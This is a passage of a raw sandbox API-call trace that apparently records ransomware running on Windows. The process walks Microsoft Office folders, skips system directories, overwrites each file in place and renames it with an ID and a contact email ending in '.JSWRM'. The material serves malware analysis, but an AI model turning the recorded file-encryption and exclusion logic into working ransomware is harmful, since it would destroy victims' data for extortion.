(lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="windows") returned -1 [0102.082] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="recovery") returned -1 [0102.082] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="perflogs") returned -1 [0102.083] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="documents and settings") returned -1 [0102.083] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="$RECYCLE.BIN") returned 1 [0102.083] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="system volume information") returned -1 [0102.083] lstrcmpiW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2="msocache") returned -1 [0102.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0102.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0102.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpUsedDefaultChar=0x0) returned 42 [0102.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0102.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0102.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0102.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", cchWideChar=42, lpMultiByteStr=0x22d0a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpUsedDefaultChar=0x0) returned 42 [0102.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0102.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0102.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0102.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0102.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.086] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24558) returned 1 [0102.086] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5fe0) returned 0x24c1d0 [0102.086] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5fe0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5fe0, lpOverlapped=0x0) returned 1 [0102.089] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.089] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5fe0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5fe0, lpOverlapped=0x0) returned 1 [0102.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.089] CloseHandle (hObject=0x45c) returned 1 [0102.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0102.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0102.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0102.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0102.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0102.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0102.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.090] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proof.culture.msi.16.fr-fr.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0102.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0102.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0102.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.091] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd36c4db5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd36c4db5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd37f6035, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.proofing.msi.16.en-us.xml", cAlternateFileName="C24618~1.XML")) returned 1 [0102.091] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2=".") returned 1 [0102.091] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="..") returned 1 [0102.091] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="...") returned 1 [0102.091] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="windows") returned -1 [0102.091] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="recovery") returned -1 [0102.091] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0102.091] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0102.091] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0102.091] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0102.091] lstrcmpiW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="msocache") returned -1 [0102.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0102.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.proofing.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.proofing.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.proofing.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 37 [0102.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0102.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0102.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.proofing.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.proofing.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.proofing.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 37 [0102.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0102.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0102.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0102.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0102.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proofing.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.092] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2042) returned 1 [0102.092] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7f0) returned 0x20c6c0 [0102.092] ReadFile (in: hFile=0x45c, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345ec04*=0x7f0, lpOverlapped=0x0) returned 1 [0102.094] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.094] WriteFile (in: hFile=0x45c, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345ec00*=0x7f0, lpOverlapped=0x0) returned 1 [0102.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0102.094] CloseHandle (hObject=0x45c) returned 1 [0102.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0102.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0102.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0102.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0102.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0102.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0102.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.094] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proofing.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.proofing.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.proofing.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0102.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0102.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0102.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.095] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd295b9b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd295b9b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2b97d2d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12e4a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", cAlternateFileName="C2C6D1~1.XML")) returned 1 [0102.095] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0102.095] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0102.095] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0102.095] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0102.095] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0102.095] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0102.095] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0102.095] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0102.095] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0102.096] lstrcmpiW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0102.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0102.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0102.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 56 [0102.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0102.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0102.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0102.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0102.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", cchWideChar=56, lpMultiByteStr=0x20d578, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 56 [0102.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0102.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0102.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0102.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0102.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.121] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=77386) returned 1 [0102.121] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12e40) returned 0x24c1d0 [0102.122] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x12e40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x12e40, lpOverlapped=0x0) returned 1 [0102.128] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.128] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x12e40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x12e40, lpOverlapped=0x0) returned 1 [0102.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.128] CloseHandle (hObject=0x45c) returned 1 [0102.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0102.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0102.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0102.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247b80 [0102.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0102.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0102.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.128] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0102.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 